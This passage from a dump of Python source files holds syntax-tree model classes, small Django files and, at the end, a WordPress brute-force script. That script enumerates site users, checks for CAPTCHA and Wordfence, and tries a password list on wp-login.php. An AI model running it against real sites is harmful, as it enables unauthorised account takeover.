return '{}({})'.format(' ' * indent, pretty_str(self.value))
return pretty_str(self.value, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {!r}'.format(self.result, self.value)
CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue,
CodeLiteral, CodeExpression)
CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral)
class CodeNull(CodeLiteral):
"""This class represents an indefinite value.
Many programming languages have their own version of this concept:
Java has null references, C/C++ NULL pointers, Python None and so on.
"""
def __init__(self, scope, parent, paren=False):
"""Constructor for null literals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
paren (bool): Whether the null literal is enclosed in parentheses.
"""
CodeLiteral.__init__(self, scope, parent, None, 'null', paren)
def _children(self):
"""Yield all the children of this object, that is no children.
This class inherits from CodeLiteral just for consistency with the
class hierarchy. It should have no children, thus an empty iterator
is returned.
"""
return iter(())
class CodeCompositeLiteral(CodeLiteral):
"""This class represents a composite literal.
A composite literal is any type of literal whose value is compound,
rather than simple. An example present in many programming languages
are list literals, often constructed as `[1, 2, 3]`.
A composite literal has a sequence of values that compose it
(`values`), a type (`result`), and it should indicate whether it is
enclosed in parentheses.
"""
def __init__(self, scope, parent, result, value=(), paren=False):
"""Constructor for a compound literal.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
value (iterable): The initial value sequence in this composition.
result (str): The return type of the literal in the program.
Kwargs:
paren (bool): Whether the literal is enclosed in parentheses.
"""
try:
value = list(value)
except TypeError as te:
raise AssertionError(str(te))
CodeLiteral.__init__(self, scope, parent, value, result, paren)
@property
def values(self):
return tuple(self.value)
def _add_value(self, child):
"""Add a value to the sequence in this composition."""
self.value.append(child)
def _children(self):
"""Yield all direct children of this object."""
for value in self.value:
if isinstance(value, CodeEntity):
yield value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
values = '{{{}}}'.format(', '.join(map(pretty_str, self.value)))
if self.parenthesis:
return '{}({})'.format(indent, values)
return '{}{}'.format(indent, values)
def __repr__(self):
"""Return a string representation of this object."""
return '[{}] {{{}}}'.format(self.result,
', '.join(map(repr, self.value)))
class CodeReference(CodeExpression):
"""This class represents a reference expression (e.g. to a variable).
A reference typically has a name (of what it is referencing),
and a return type.
If the referenced entity is known, `reference` should be set.
If the reference is a field/attribute of an object, `field_of`
should be set to that object.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for references.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the reference in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the reference is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.field_of = None
self.reference = None
def _set_field(self, codeobj):
"""Set the object that contains the attribute this is a reference of."""
assert isinstance(codeobj, CodeExpression)
self.field_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.field_of:
yield self.field_of
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
name = ('{}.{}'.format(self.field_of.pretty_str(), self.name)
if self.field_of else self.name)
return pretty.format(spaces, name)
def __str__(self):
"""Return a string representation of this object."""
return '#' + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.field_of:
return '[{}] ({}).{}'.format(self.result, self.field_of, self.name)
return '[{}] #{}'.format(self.result, self.name)
class CodeOperator(CodeExpression):
"""This class represents an operator expression (e.g. `a + b`).
Operators can be unary or binary, and often return numbers
or booleans. Some languages also support ternary operators.
Do note that assignments are often considered expressions,
and, as such, assignment operators are included here.
An operator typically has a name (its token), a return type,
and a tuple of its arguments.
"""
_UNARY_TOKENS = ("+", "-")
_BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=",
"==", "!=", "&&", "||", "=")
def __init__(self, scope, parent, name, result, args=None, paren=False):
"""Constructor for operators.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the operator in the program.
result (str): The return type of the operator in the program.
Kwargs:
args (tuple): Initial tuple of arguments.
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.arguments = args or ()
@property
def is_unary(self):
"""Whether this is a unary operator."""
return len(self.arguments) == 1
@property
def is_binary(self):
"""Whether this is a binary operator."""
return len(self.arguments) == 2
@property
def is_ternary(self):
"""Whether this is a ternary operator."""
return len(self.arguments) == 3
@property
def is_assignment(self):
"""Whether this is an assignment operator."""
return self.name == "="
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
if self.is_unary:
operator = self.name + pretty_str(self.arguments[0])
else:
operator = '{} {} {}'.format(pretty_str(self.arguments[0]),
self.name,
pretty_str(self.arguments[1]))
return pretty.format(indent, operator)
def __repr__(self):
"""Return a string representation of this object."""
if self.is_unary:
return '[{}] {}({})'.format(self.result, self.name,
self.arguments[0])
if self.is_binary:
return '[{}] ({}){}({})'.format(self.result, self.arguments[0],
self.name, self.arguments[1])
return '[{}] {}'.format(self.result, self.name)
class CodeFunctionCall(CodeExpression):
"""This class represents a function call.
A function call typically has a name (of the called function),
a return type, a tuple of its arguments and a reference to the
called function.
If a call references a class method, its `method_of` should be
set to the object on which a method is being called.
"""
def __init__(self, scope, parent, name, result, paren=False):
"""Constructor for function calls.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the function in the program.
result (str): The return type of the expression in the program.
Kwargs:
paren (bool): Whether the expression is enclosed in parentheses.
"""
CodeExpression.__init__(self, scope, parent, name, result, paren)
self.full_name = name
self.arguments = ()
self.method_of = None
self.reference = None
@property
def is_constructor(self):
"""Whether the called function is a constructor."""
return self.result == self.name
def _add(self, codeobj):
"""Add a child (argument) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.arguments = self.arguments + (codeobj,)
def _set_method(self, codeobj):
"""Set the object on which a method is called."""
assert isinstance(codeobj, CodeExpression)
self.method_of = codeobj
def _children(self):
"""Yield all direct children of this object."""
if self.method_of:
yield self.method_of
for codeobj in self.arguments:
if isinstance(codeobj, CodeExpression):
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
pretty = '{}({})' if self.parenthesis else '{}{}'
args = ', '.join(map(pretty_str, self.arguments))
if self.method_of:
call = '{}.{}({})'.format(self.method_of.pretty_str(),
self.name, args)
elif self.is_constructor:
call = 'new {}({})'.format(self.name, args)
else:
call = '{}({})'.format(self.name, args)
return pretty.format(indent, call)
def __repr__(self):
"""Return a string representation of this object."""
args = ', '.join(map(str, self.arguments))
if self.is_constructor:
return '[{}] new {}({})'.format(self.result, self.name, args)
if self.method_of:
return '[{}] {}.{}({})'.format(self.result, self.method_of.name,
self.name, args)
return '[{}] {}({})'.format(self.result, self.name, args)
class CodeDefaultArgument(CodeExpression):
"""This class represents a default argument.
Some languages, such as C++, allow function parameters to have
default values when not explicitly provided by the programmer.
This class represents such omitted arguments.
A default argument has only a return type.
"""
def __init__(self, scope, parent, result):
"""Constructor for default arguments.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
result (str): The return type of the argument in the program.
"""
CodeExpression.__init__(self, scope, parent, '(default)', result)
# ----- Statement Entities ----------------------------------------------------
class CodeStatement(CodeEntity):
"""Base class for program statements.
Programming languages often define diverse types of statements
(e.g. return statements, control flow, etc.).
This class provides common functionality for such statements.
In many languages, statements must be contained within a function.
"""
def __init__(self, scope, parent):
"""Constructor for statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeEntity.__init__(self, scope, parent)
self._si = -1
@property
def function(self):
"""The function where this statement appears in."""
return self._lookup_parent(CodeFunction)
class CodeJumpStatement(CodeStatement):
"""This class represents a jump statement (e.g. `return`, `break`).
A jump statement has a name. In some cases, it may also have an
associated value (e.g. `return 0`).
"""
def __init__(self, scope, parent, name):
"""Constructor for jump statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.value = None
def _add(self, codeobj):
"""Add a child (value) to this object."""
assert isinstance(codeobj, CodeExpression.TYPES)
self.value = codeobj
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.value, CodeExpression):
yield self.value
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
indent = ' ' * indent
if self.value is not None:
return '{}{} {}'.format(indent, self.name, pretty_str(self.value))
return indent + self.name
def __repr__(self):
"""Return a string representation of this object."""
if self.value is not None:
return '{} {}'.format(self.name, str(self.value))
return self.name
class CodeExpressionStatement(CodeStatement):
"""This class represents an expression statement. It is only a wrapper.
Many programming languages allow expressions to be statements
on their own. A common example is the assignment operator, which
can be a statement on its own, but also returns a value when
contained within a larger expression.
"""
def __init__(self, scope, parent, expression=None):
"""Constructor for expression statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
expression (CodeExpression): The expression of this statement.
"""
CodeStatement.__init__(self, scope, parent)
self.expression = expression
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.expression, CodeExpression):
yield self.expression
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
return pretty_str(self.expression, indent=indent)
def __repr__(self):
"""Return a string representation of this object."""
return repr(self.expression)
class CodeBlock(CodeStatement, CodeStatementGroup):
"""This class represents a code block (e.g. `{}` in C, C++, Java, etc.).
Blocks are little more than collections of statements, while being
    considered statements themselves.
Some languages allow blocks to be implicit in some contexts, e.g.
an `if` statement omitting curly braces in C, C++, Java, etc.
This model assumes that control flow branches and functions always
have a block as their body.
"""
def __init__(self, scope, parent, explicit=True):
"""Constructor for code blocks.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
Kwargs:
explicit (bool): Whether the block is explicit in the code.
"""
CodeStatement.__init__(self, scope, parent)
self.body = []
self.explicit = explicit
def statement(self, i):
"""Return the *i*-th statement of this block."""
return self.body[i]
def _add(self, codeobj):
"""Add a child (statement) to this object."""
assert isinstance(codeobj, CodeStatement)
codeobj._si = len(self.body)
self.body.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if self.body:
return '\n'.join(stmt.pretty_str(indent) for stmt in self.body)
else:
return (' ' * indent) + '[empty]'
def __repr__(self):
"""Return a string representation of this object."""
return str(self.body)
class CodeDeclaration(CodeStatement):
"""This class represents a declaration statement.
Some languages, such as C, C++ or Java, consider this special
kind of statement for declaring variables within a function,
for instance.
A declaration statement contains a list of all declared variables.
"""
def __init__(self, scope, parent):
"""Constructor for declaration statements.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.variables = []
def _add(self, codeobj):
"""Add a child (variable) to this object."""
assert isinstance(codeobj, CodeVariable)
self.variables.append(codeobj)
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.variables:
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
return spaces + ', '.join(v.pretty_str() for v in self.variables)
def __repr__(self):
"""Return a string representation of this object."""
return str(self.variables)
class CodeControlFlow(CodeStatement, CodeStatementGroup):
"""Base class for control flow structures (e.g. `for` loops).
Control flow statements are assumed to have, at least, one branch
(a boolean condition and a `CodeBlock` that is executed when
the condition is met). Specific implementations may consider
more branches, or default branches (executed when no condition is met).
A control flow statement typically has a name.
"""
def __init__(self, scope, parent, name):
"""Constructor for control flow structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the control flow statement in the program.
"""
CodeStatement.__init__(self, scope, parent)
self.name = name
self.condition = True
self.body = CodeBlock(scope, self, explicit=False)
def get_branches(self):
"""Return a list of branches, where each branch is a pair of
condition and respective body."""
return [(self.condition, self.body)]
def _set_condition(self, condition):
"""Set the condition for this control flow structure."""
assert isinstance(condition, CodeExpression.TYPES)
self.condition = condition
def _set_body(self, body):
"""Set the main body for this control flow structure."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.body = body
else:
self.body._add(body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return '{} {}'.format(self.name, self.get_branches())
class CodeConditional(CodeControlFlow):
"""This class represents a conditional (`if`).
A conditional is allowed to have a default branch (the `else` branch),
besides its mandatory one.
"""
def __init__(self, scope, parent):
"""Constructor for conditionals.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, 'if')
self.else_body = CodeBlock(scope, self, explicit=False)
@property
def then_branch(self):
"""The branch associated with a condition."""
return self.condition, self.body
@property
def else_branch(self):
"""The default branch of the conditional."""
return True, self.else_body
def statement(self, i):
"""Return the *i*-th statement of this block.
Behaves as if the *then* and *else* branches were
concatenated, for indexing purposes.
"""
# ----- This code is just to avoid creating a new list and
# returning a custom exception message.
o = len(self.body)
n = o + len(self.else_body)
if i >= 0 and i < n:
if i < o:
return self.body.statement(i)
return self.else_body.statement(i - o)
elif i < 0 and i >= -n:
if i >= o - n:
return self.else_body.statement(i)
return self.body.statement(i - o + n)
raise IndexError('statement index out of range')
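    # Illustrative mapping: with two statements in the then-branch and one in
    # the else-branch (o == 2, n == 3), statement(0) and statement(1) come
    # from the then-branch, statement(2) is else_body[0], statement(-1) is
    # else_body[-1], and statement(-3) is the first then-statement.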
def statement_after(self, i):
"""Return the statement after the *i*-th one, or `None`."""
k = i + 1
o = len(self.body)
n = o + len(self.else_body)
        # Mirror the positive/negative index mapping used in statement().
        if k > 0:
            if k < o:
                return self.body.statement(k)
            if o <= k < n:
                return self.else_body.statement(k - o)
        if k < 0:
            if o - n <= k:
                return self.else_body.statement(k)
            if -n < k:
                return self.body.statement(k - o + n)
return None
def get_branches(self):
"""Return a list with the conditional branch and the default branch."""
        if self.else_body:
return [self.then_branch, self.else_branch]
return [self.then_branch]
def _add_default_branch(self, body):
"""Add a default body for this conditional (the `else` branch)."""
assert isinstance(body, CodeStatement)
if isinstance(body, CodeBlock):
self.else_body = body
else:
self.else_body._add(body)
def __len__(self):
"""Return the length of both branches combined."""
return len(self.body) + len(self.else_body)
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.condition, CodeExpression):
yield self.condition
for codeobj in self.body._children():
yield codeobj
for codeobj in self.else_body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}if ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
if self.else_body:
pretty += '\n{}else:\n'.format(spaces)
pretty += self.else_body.pretty_str(indent=indent + 2)
return pretty
class CodeLoop(CodeControlFlow):
"""This class represents a loop (e.g. `while`, `for`).
Some languages allow loops to define local declarations, as well
as an increment statement.
A loop has only a single branch, its condition plus the body
that should be repeated while the condition holds.
"""
def __init__(self, scope, parent, name):
"""Constructor for loops.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
name (str): The name of the loop statement in the program.
"""
CodeControlFlow.__init__(self, scope, parent, name)
self.declarations = None
self.increment = None
def _set_declarations(self, declarations):
"""Set declarations local to this loop (e.g. `for` variables)."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_increment(self, statement):
"""Set the increment statement for this loop (e.g. in a `for`)."""
assert isinstance(statement, CodeStatement)
self.increment = statement
statement.scope = self.body
def _children(self):
"""Yield all direct children of this object."""
if self.declarations:
yield self.declarations
if isinstance(self.condition, CodeExpression):
yield self.condition
if self.increment:
yield self.increment
for codeobj in self.body._children():
yield codeobj
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
v = self.declarations.pretty_str() if self.declarations else ''
i = self.increment.pretty_str(indent=1) if self.increment else ''
pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeSwitch(CodeControlFlow):
"""This class represents a switch statement.
A switch evaluates a value (its `condition`) and then declares
at least one branch (*cases*) that execute when the evaluated value
is equal to the branch value. It may also have a default branch.
Switches are often one of the most complex constructs of programming
languages, so this implementation might be lackluster.
"""
def __init__(self, scope, parent):
"""Constructor for switches.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeControlFlow.__init__(self, scope, parent, "switch")
self.cases = []
self.default_case = None
def _add_branch(self, value, statement):
"""Add a branch/case (value and statement) to this switch."""
self.cases.append((value, statement))
def _add_default_branch(self, statement):
"""Add a default branch to this switch."""
self.default_case = statement
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
condition = pretty_str(self.condition)
pretty = '{}switch ({}):\n'.format(spaces, condition)
pretty += self.body.pretty_str(indent=indent + 2)
return pretty
class CodeTryBlock(CodeStatement, CodeStatementGroup):
"""This class represents a try-catch block statement.
`try` blocks have a main body of statements, just like regular blocks.
Multiple `catch` blocks may be defined to handle specific types of
exceptions.
Some languages also allow a `finally` block that is executed after
the other blocks (either the `try` block, or a `catch` block, when
an exception is raised and handled).
"""
def __init__(self, scope, parent):
"""Constructor for try block structures.
Args:
scope (CodeEntity): The program scope where this object belongs.
parent (CodeEntity): This object's parent in the program tree.
"""
CodeStatement.__init__(self, scope, parent)
self.body = CodeBlock(scope, self, explicit=True)
self.catches = []
self.finally_body = CodeBlock(scope, self, explicit=True)
def _set_body(self, body):
"""Set the main body for try block structure."""
assert isinstance(body, CodeBlock)
self.body = body
def _add_catch(self, catch_block):
"""Add a catch block (exception variable declaration and block)
to this try block structure.
"""
assert isinstance(catch_block, self.CodeCatchBlock)
self.catches.append(catch_block)
def _set_finally_body(self, body):
"""Set the finally body for try block structure."""
assert isinstance(body, CodeBlock)
self.finally_body = body
def _children(self):
"""Yield all direct children of this object."""
for codeobj in self.body._children():
yield codeobj
for catch_block in self.catches:
for codeobj in catch_block._children():
yield codeobj
for codeobj in self.finally_body._children():
yield codeobj
def __len__(self):
"""Return the length of all blocks combined."""
n = len(self.body) + len(self.catches) + len(self.finally_body)
n += sum(map(len, self.catches))
return n
def __repr__(self):
"""Return a string representation of this object."""
return 'try {} {} {}'.format(self.body, self.catches,
self.finally_body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
pretty = spaces + 'try:\n'
pretty += self.body.pretty_str(indent=indent + 2)
for block in self.catches:
pretty += '\n' + block.pretty_str(indent)
if len(self.finally_body) > 0:
pretty += '\n{}finally:\n'.format(spaces)
pretty += self.finally_body.pretty_str(indent=indent + 2)
return pretty
class CodeCatchBlock(CodeStatement, CodeStatementGroup):
"""Helper class for catch statements within a try-catch block."""
def __init__(self, scope, parent):
"""Constructor for catch block structures."""
CodeStatement.__init__(self, scope, parent)
self.declarations = None
self.body = CodeBlock(scope, self, explicit=True)
def _set_declarations(self, declarations):
"""Set declarations local to this catch block."""
assert isinstance(declarations, CodeStatement)
self.declarations = declarations
declarations.scope = self.body
def _set_body(self, body):
"""Set the main body of the catch block."""
assert isinstance(body, CodeBlock)
self.body = body
def _children(self):
"""Yield all direct children of this object."""
if isinstance(self.declarations, CodeStatement):
yield self.declarations
for codeobj in self.body._children():
yield codeobj
def __repr__(self):
"""Return a string representation of this object."""
return 'catch ({}) {}'.format(self.declarations, self.body)
def pretty_str(self, indent=0):
"""Return a human-readable string representation of this object.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
spaces = ' ' * indent
decls = ('...' if self.declarations is None
else self.declarations.pretty_str())
body = self.body.pretty_str(indent=indent + 2)
pretty = '{}catch ({}):\n{}'.format(spaces, decls, body)
return pretty
###############################################################################
# Helpers
###############################################################################
def pretty_str(something, indent=0):
"""Return a human-readable string representation of an object.
Uses `pretty_str` if the given value is an instance of
`CodeEntity` and `repr` otherwise.
Args:
something: Some value to convert.
Kwargs:
indent (int): The amount of spaces to use as indentation.
"""
if isinstance(something, CodeEntity):
return something.pretty_str(indent=indent)
else:
return (' ' * indent) + repr(something)
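
# A minimal usage sketch: build the expression `(a + 1)` by hand and print it.
# Passing `None` for the scope and parent entities is an assumption made only
# for this demo; a real parser would supply proper `CodeEntity` instances.
if __name__ == '__main__':
    ref = CodeReference(None, None, 'a', 'int')
    add = CodeOperator(None, None, '+', 'int', args=(ref, 1), paren=True)
    print(pretty_str(add))  # -> (a + 1)
    print(repr(add))        # -> [int] (#a)+(1)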
| [] |
felipe-menelau/todo-list-web | api/views/todo_views.py | 9b60a549dc6d5bdd88e1a584b8bb2c4f56131cb5 | from django.contrib.auth.models import User
from rest_framework import viewsets, status
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated, IsAdminUser
from api.serializers import TODOListSerializer
from api.models import TODOList
class TODOListViewSet(viewsets.ModelViewSet):
permission_classes = [IsAuthenticated]
serializer_class = TODOListSerializer
def get_queryset(self):
user = self.request.user
        return TODOList.objects.filter(owner=user).order_by('created_at')
def create(self, request, *args, **kwargs):
request.data['owner'] = request.user.id
        # super(self.__class__, self) recurses if this view is ever subclassed.
        return super().create(request, *args, **kwargs)
| [((16, 15, 16, 63), 'api.models.TODOList.objects.filter', 'TODOList.objects.filter', (), '', False, 'from api.models import TODOList\n')] |
techkey/PTVS | Python/Tests/TestData/ProjectHomeProjects/Subfolder/ProgramB.py | 8355e67eedd8e915ca49bd38a2f36172696fd903 | # ProgramB.py
print('Hello World')
| [] |
effective-altruism-australia/donation-portal | donation/migrations/0043_auto_20180109_0012.py | 45fe58edc44d0c4444b493e4ac025fc53897c799 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
def copy_existing_referrals_into_new_field(apps, schema_editor):
Pledge = apps.get_model('donation', 'Pledge')
Referral = apps.get_model('donation', 'Referral')
reasons = Pledge.objects.values_list('how_did_you_hear_about_us', flat=True).distinct()
for reason in reasons:
if reason: # Filter out None and u''
Referral.objects.create(reason=reason)
for pledge in Pledge.objects.all():
reason = pledge.how_did_you_hear_about_us
if reason:
pledge.how_did_you_hear_about_us_db = Referral.objects.get(reason=reason)
pledge.save()
class Migration(migrations.Migration):
dependencies = [
('donation', '0042_amend_donation_view'),
]
operations = [
migrations.CreateModel(
name='Referral',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reason', models.CharField(max_length=256)),
],
),
migrations.AddField(
model_name='pledge',
name='how_did_you_hear_about_us_db',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, verbose_name='How did you hear about us?', blank=True, to='donation.Referral', null=True),
),
migrations.RunPython(copy_existing_referrals_into_new_field)
]
| [((42, 8, 42, 68), 'django.db.migrations.RunPython', 'migrations.RunPython', ({(42, 29, 42, 67): 'copy_existing_referrals_into_new_field'}, {}), '(copy_existing_referrals_into_new_field)', False, 'from django.db import migrations, models\n'), ((40, 18, 40, 170), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((33, 23, 33, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((34, 27, 34, 59), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n')] |
c1m50c/twitter-examples | python/is_even.py | c3ed7cf88dacbb761fed1b0b0dc593d7d3648378 | def is_even(i: int) -> bool:
if i == 1:
return False
elif i == 2:
return True
elif i == 3:
return False
elif i == 4:
return True
elif i == 5:
...
# Never do that! Use one of these instead...
is_even = lambda i : i % 2 == 0
is_even = lambda i : not i & 1
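# The bitwise form works because the lowest bit of any even integer is 0, so
# `i & 1` is 0 (falsy) for even `i` and 1 (truthy) for odd `i`:
# (4 & 1) == 0, (5 & 1) == 1.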
is_odd = lambda i : not is_even(i) | [] |
RandomRobbieBF/wordpress-bf | wordpress-brute.py | fe78d4367b7baaf18a4200c5c040595d37b4100f | #!/usr/bin/env python
#
# Wordpress Bruteforce Tool
#
# By @random_robbie
#
#
import requests
import json
import sys
import argparse
import re
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL")
parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File")
args = parser.parse_args()
url = args.url
passfile = args.file
http_proxy = ""
proxyDict = {
"http" : http_proxy,
"https" : http_proxy,
"ftp" : http_proxy
}
# Grab Wordpress Users via Wordpress JSON api
def grab_users_api(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict)
if 'rest_user_cannot_view' in response.text:
print ("[-] REST API Endpoint Requires Permissions [-]")
return False
if response.status_code == 404:
print ("[-] Rest API Endpoint returns 404 Not Found [-]")
return False
elif response.status_code == 200:
jsonstr = json.loads(response.content)
return jsonstr
# Grab Wordpress Users via Sitemap
def grab_users_sitemap(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
return response.text
# Grab Wordpress Users via RSS Feed
def grab_users_rssfeed(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict)
if response.status_code == 404:
return False
elif response.status_code == 200:
if "dc:creator" in response.text:
return response.text
# Check we can get to wp-admin login.
def check_wpadmin(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict)
if "Powered by WordPress" in response.text:
if "wp-submit" in response.text:
if "reCAPTCHA" not in response.text:
return True
else:
return False
else:
return False
else:
return False
# Check URL is wordpress
def check_is_wp(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"", headers=headers,verify=False, proxies=proxyDict)
if "wp-content" in response.text:
return True
else:
return False
# Check if wordfence is installed as this limits the logins to 20 per ip
def check_wordfence(url):
headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"}
response = session.get(""+url+"/wp-content/plugins/wordfence/readme.txt", headers=headers,verify=False, proxies=proxyDict)
if "Wordfence Security - Firewall & Malware Scan" in response.text:
return True
else:
return False
# Test the logins
def test_login (url,user,password,cnt,attempts):
if str(cnt) == attempts:
print("[-] Stopping as Wordfence will block your IP [-]")
sys.exit(0)
paramsPost = {"wp-submit":"Log In","pwd":""+password+"","log":""+user+"","testcookie":"1","redirect_to":""+url+"/wp-admin/"}
headers = {"Origin":""+url+"","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
cookies = {"wordpress_test_cookie":"WP+Cookie+check"}
response = session.post(""+url+"/wp-login.php?redirect_to="+url+"/wp-admin/", data=paramsPost, headers=headers, cookies=cookies,verify=False, proxies=proxyDict,allow_redirects = False)
if response.status_code == 503:
